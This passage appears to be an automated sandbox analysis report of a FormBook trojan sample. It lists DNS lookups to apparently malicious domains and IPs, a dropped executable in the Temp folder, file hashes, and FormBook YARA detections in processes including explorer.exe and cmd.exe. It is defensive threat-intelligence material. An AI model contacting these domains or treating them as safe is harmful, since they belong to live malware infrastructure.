Mar 20, 2023 17:00:31.183070898 CET | 8.8.8.8 | 192.168.2.4 | 0x5edb | No error (0) | www.thewildphotographer.co.uk | | 45.33.20.235 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:31.183070898 CET | 8.8.8.8 | 192.168.2.4 | 0x5edb | No error (0) | www.thewildphotographer.co.uk | | 72.14.178.174 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:31.183070898 CET | 8.8.8.8 | 192.168.2.4 | 0x5edb | No error (0) | www.thewildphotographer.co.uk | | 198.58.118.167 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:31.183070898 CET | 8.8.8.8 | 192.168.2.4 | 0x5edb | No error (0) | www.thewildphotographer.co.uk | | 96.126.123.244 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:31.183070898 CET | 8.8.8.8 | 192.168.2.4 | 0x5edb | No error (0) | www.thewildphotographer.co.uk | | 72.14.185.43 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:31.183070898 CET | 8.8.8.8 | 192.168.2.4 | 0x5edb | No error (0) | www.thewildphotographer.co.uk | | 45.33.2.79 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:31.183070898 CET | 8.8.8.8 | 192.168.2.4 | 0x5edb | No error (0) | www.thewildphotographer.co.uk | | 173.255.194.134 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:31.183070898 CET | 8.8.8.8 | 192.168.2.4 | 0x5edb | No error (0) | www.thewildphotographer.co.uk | | 45.33.18.44 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:31.183070898 CET | 8.8.8.8 | 192.168.2.4 | 0x5edb | No error (0) | www.thewildphotographer.co.uk | | 45.33.23.183 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:39.320899963 CET | 8.8.8.8 | 192.168.2.4 | 0x317e | No error (0) | www.shapshit.xyz | | 199.192.30.147 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:47.680247068 CET | 8.8.8.8 | 192.168.2.4 | 0x692b | No error (0) | www.thedivinerudraksha.com | thedivinerudraksha.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 17:00:47.680247068 CET | 8.8.8.8 | 192.168.2.4 | 0x692b | No error (0) | thedivinerudraksha.com | | 85.187.128.34 | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:56.368645906 CET | 8.8.8.8 | 192.168.2.4 | 0x95e7 | Name error (3) | www.fclaimrewardccpointq.shop | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:00:57.408945084 CET | 8.8.8.8 | 192.168.2.4 | 0x29b0 | Name error (3) | www.fclaimrewardccpointq.shop | none | none | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:01:02.627077103 CET | 8.8.8.8 | 192.168.2.4 | 0xbf61 | No error (0) | www.un-object.com | un-object.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 17:01:02.627077103 CET | 8.8.8.8 | 192.168.2.4 | 0xbf61 | No error (0) | un-object.com | | 192.185.17.12 | A (IP address) | IN (0x0001) | false
• www.white-hat.uk
• www.gritslab.com
• www.bitservicesltd.com
• www.222ambking.org
• www.energyservicestation.com
• www.younrock.com
• www.thewildphotographer.co.uk
• www.shapshit.xyz
• www.thedivinerudraksha.com
• www.un-object.com


Target ID: 0
Start time: 16:59:05
Start date: 20/03/2023
Path: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
Imagebase: 0x400000
File size: 299717 bytes
MD5 hash: C7714B273571BA64C0B77AFCA236AC6D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Target ID: 1
Start time: 16:59:05
Start date: 20/03/2023
Path: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m
Imagebase: 0x400000
File size: 95232 bytes
MD5 hash: 6D30D26416D626447BA4298A59111F6D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 39%, ReversingLabs
Reputation: low

Target ID: 2
Start time: 16:59:05
Start date: 20/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7c72c0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 3
Start time: 16:59:06
Start date: 20/03/2023
Path: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
Imagebase: 0x400000
File size: 95232 bytes
MD5 hash: 6D30D26416D626447BA4298A59111F6D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation: low

Target ID: 4
Start time: 16:59:12
Start date: 20/03/2023
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff618f60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

Target ID: 5
Start time: 16:59:25
Start date: 20/03/2023
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\cmd.exe
Imagebase: 0xd90000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation: high

No disassembly